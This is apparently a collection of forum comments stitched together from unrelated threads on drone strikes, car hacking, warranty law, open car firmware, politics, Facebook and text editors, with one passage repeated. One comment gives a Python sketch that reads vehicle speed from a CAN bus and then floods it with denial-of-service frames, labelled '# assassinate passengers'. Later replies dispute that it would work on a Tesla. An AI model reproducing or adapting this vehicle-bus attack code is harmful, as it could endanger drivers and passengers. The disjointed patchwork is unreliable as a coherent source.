The Brussels atttacks were against strategic targets though.
As for the indiscriminate killing of civilians, what else would you call the example from the article?
> in Pakistan, in attempts to take out 41 men, American drones actually killed an estimated 1,147 people (while not all of the 41 targeted figures even died).
There have actually been a ton of examples over the years of researchers hacking into car systems wirelessly, some of which used the media system as the attack vector.
Even if the media subsystem is running on dedicated hardware, the fact that it's networked with the rest of the car means that there's still a risk of it being used to gain access to other components.
>Even if the media subsystem is running on dedicated hardware, the fact that it's networked with the rest of the car means that there's still a risk of it being used to gain access to other components.
I don't think anyone was claiming anything contrary to that, just that replacing the software running the media dash isn't going to fubar your car.
I don't know enough about CAN bus to speak authoritatively about this, nor do I know the specifics of what the dashboard has access to, but given that the dash displays information like charge level and speed, I'd guess that the dash is getting that information directly from the CAN.
And I do know that CAN bus is very vulnerable. [1][2]... So you may be able to kill someone through /dev/can0, via a small program running in that chroot.
Eg: In Python
from canard import can
from canard.file import jsondb
from canard.hw import socketcan
# create and start device
dev = socketcan.SocketCanDev("/dev/can0")
dev.start()
# create our DoS frame
frame = can.Frame(id=0)
frame.dlc = 8
# load tesla can spec, eg: from [4]
# CAN3, ID 0x0256
b = parser.parse('tesla.json')
while True:
rec = dev.recv()
speedo = b.parse_frame(rec)
# assassinate passengers
if (speedo.speed > 60):
while True:
dev.send(frame)
Sensible cars have a device bridging high and low security networks, forwarding data from one to the other, specifically so that a misbehaving media device or light system can't clobber the brakes or ECU. No idea if the Tesla does this or not, but it's a fairly standard approach.
Yes, it has a gateway between the high level stuff and the low level stuff. It's fairly secure too. You can't just make calls to the can bus all willy-nilly either.
It's a completely different computer—compare it to your typical web browser/web server model. The media computer can request display the battery information (the browser can get a list of products) but it cannot hit the accelerator (the browser cannot read other users' personal information). Even if you have root on the media center (your laptop), that doesn't make it so you can run any and all commands on the computer that regulates steering and acceleration (the web server).
there is a gateway between the media center canbus and the critical canbus. the gateway buffers all the data from the critical canbus and rate limits any requests for data which isn't broadcast regularly on the critical canbus.
You would have to get UID=0 on the canbus gateway to make requests 'willy nilly' on the critical canbus. Having UID=0 on the media centre would only help in making willy nilly requests to the gateway.
The chrysler was a completely different system, but it was indeed infecting the car from the radio / entertainment system. The tesla is completely different from that. They have one entire computer system that runs the "entertainment console". You can even reboot it while you are driving and nothing happens (this is by design of course). The driving controls are totally separated. The only thing you notice when you reboot that console if that the radio goes off, the display goes black during the reboot (10 seconds). Then it comes back and all is well. Press both turning cylinder controls on the steering wheel for a few seconds to start the reboot. They designed it very well. That doesn't mean it is perfect, but they have approached security correctly as far as I can tell from outside. They pay for exploits too - see https://bugcrowd.com/tesla. They have hired security researchers to work on their system and attack it.
As a tesla owner, I do wish they would hurry up and publish their app platform. They do have apps that they wrote themselves, that come with the car.
And I really wish they'd update their web browser, and even more wish they supported linux. Maybe the chromebook os support will be secure enough for android apps that even tesla could use it.
In effect, the manufacturer can only deny warranty claims for a specific part iff the consumer's aftermarket repair/modifications were responsible for the warrantied part failing. i.e. "I tinted the windows, and now the brakes are failing" does not result in warranty claims on the brakes being denied. However, "I replaced the brake pads [with faulty pads], and now the brake rotors are failing" can result in a denied warranty claim.
While I appreciate the sentiment there, that seems like its ripe for protracted litigation (which will never benefit the consumer).
Plus, in a connected car situation, its going to be very difficult to prove that one thing didn't cause another.
Because you rooted the media control system, your unapproved software had the ability to speak to the brake control system and apply more-than-designed force to the brakes and thereby caused this damage.
Could you be forced into proving a negative?
That said, I think most of these things happen in the context of class action suits. In a class action, its going to be hard to blame or exclude the 1% of the class that has rooted their car.
Not sure why you are being downvoted, you present a valid point.
The trouble is that with mechanical parts it is usually very easy to see connections between elements - not so in digital world. I think the direction the car makers should take is to develop "microservices" with strict APIs, strict access lists and a guardian which double-checks if some requested operation really makes sense. That way if you root a media center you can't mess with the engine from there.
EDIT: I see from other comments that Tesla apparently does something similar. Too bad it's not standardized and open, but at least approach is right...
False dichotomy - I think it should be similar to Kerckhoffs's principle in the long run. OSS yes, but it's signed and audited when it's able to run. Maybe like an open source version of microcode updates for CPUs. You could file a pull request because you spotted a bug but you can't fuck around your car (bad, but not so bad) and other cars (very bad).
If the Toyota code would be public we'd hear a lot of guys screaming and if you own the car and have the knowledge I guess you are keen on looking. Sure lots of noise for manufactures and likely new attack vectors but in the end public universities could look at it. On the other hand you'll end up with OpenSSL for cars.
However it should be still safe when public that what should be the design goal. However what you read about embedded stuff in cars and airplanes...OSS would be likely an improvement. I for one would like to file a pull request against the A380 firmware :)
Does the fact that most of the code in your car is autogenerated from tools like Modelica change your view on how likely this can/should be opened?
That is, the 'model' is the truth and the IP. The generated code is spaghetti, the vendors components are black boxes, and their 'code' is nothing more than another locked subsystem in the model.
Let's say in an ideal world, these mission critical systems must be opened - what do you propose everyone's business model should be? If everyone must see each others models... where is the free market competitive advantage to be gained?
Why couldn't/shouldn't people complain about it? It's like how you can be against paparazzi. The fact that something is legal doesn't make it morally right or immune to criticism.
Paparazzi ambush people going on with their daily lives - they have no choice but to venture outside (into public places) sometime. That's hardly the same as deliberately publishing something on a public network.
That said, sure, you can complain about it. I guess I just don't see the point.
That's one way of putting it. In reference to that article on trying to find supposedly "radicalized" kids that might become "terrorists", it's probably more accurate to say this is what fascism/totalitarianism[1] looks like, or perhaps simply racism.
While it won't explain what's going through the heads of the people causing this crap, I recommend listening to some of the people that are being targeted in the 32c3 talk "The Price Of Dissent"[3]. It doesn't have many answers, but it does paint a very good picture of the current state of fear, xenophobia, and oppression.
[1] The UK isn't the only country heading rapidly towards fascism. On the other side of the pond we have "banned from CNN" Roger Stone managing Trump's campaign tactics, who just promised to "'disclose the hotels and the room numbers of those delegates' who were involved in 'stealing' the nomination from Trump"[2]. This could get really ugly, really fast.
I agree that it sounds risky ti srarr a startup with people we dont know well enough to tell if our vision and interests align. That being said, I'd be willing to work on a not-for-profit side project or proof of concept.
With memorizing numbers as well, splitting them into chunks is also a good tactic, for example 392619582767 -> 392 619 582 767. It makes the whole thing a lot more tractable.
As much as I dislike facebook, I've moved around a lot throughout my life, as have a lot of my friends, both from high school and university. So realistically, I just don't see any realistic alternative single platform which allows me to keep in touch with all these people.
If such a platform did exist, and I knew about it, I would switch immediately. Their entire business model revolves around getting users addicted, and their history of abusing user's data means I will never be able to even trust the platform.
That being said, I limit my facebook usage to messanger and wishing people happy birthday, so I guess it could be worse.
True, but I also need people I want to talk to to be on the messaging tool, which is the real issue here.
As for email, to me it just doesn't serve the same purpose that IM does. It's analogous to sending letters back and forth as opposed to having a face-to-face conversation -- the increased time lag between replies encouraged by the medium has a huge influence on the nature of conversations that occur through it.
I still use email, for example when I want to send something more in-depth to someone and I don't expect a quick reply. But it's not the right tool if I want a real-time, informal conversation with someone, which is most of my conversations.
I use Google Messenger. Everyone has a cell phone number. No need to enroll. I can share pictures, audio, text, video. Text messaging is the only thing you need.
I have a group chat with 2/3 other friends I've know for 20+ years. Then I usually text others individually.
Facebook is an awful medium to conduct intimate conversations over. After two failed attempts to ditch it in the past, I've been off Facebook for a year. I can attest that you won't miss it. Just use SMS.
Somewhat related, I started out using Emacs and have since moved to using vim. I'm at the point where I feel semi-proficient in it, and I've started playing around with .vimrc, pathogen-based addons, as well as other stuff like ctags a bit, and based on my experience so far this extensibility and customization is what makes the text editor so powerful compared to other ones (although I can't really speak for Emacs since I didn't get as far with it).
That being said, I've recently started picking up an interest in lisp (currently slowly making my way through sicp), and I've seen indications that Emacs is somehow more suited to lisp development than vim. As a result, I've actually been considering switching back again, despite emacs pinky, although I'm still on the fence about this.
If anybody here has some knowledge about what Emacs offers in terms of lisp development that vim doesn't (or vice versa) and/or has some good references, I would be very interested to know.
The beauty of emacs is that it is extremely customizable. spacemacs features a full fledged vim emulation mode that does a great job of feeling like vim.
As far as lisp development goes, the reason for emacs being a "better" environment is that it is implemented in a flavour of lisp, so you see a lot of great packages (paredit/smartparens, SLIME, to name a few) built with lisp in mind. Plus you will be editing your config file in lisp.
As for the indiscriminate killing of civilians, what else would you call the example from the article?
> in Pakistan, in attempts to take out 41 men, American drones actually killed an estimated 1,147 people (while not all of the 41 targeted figures even died).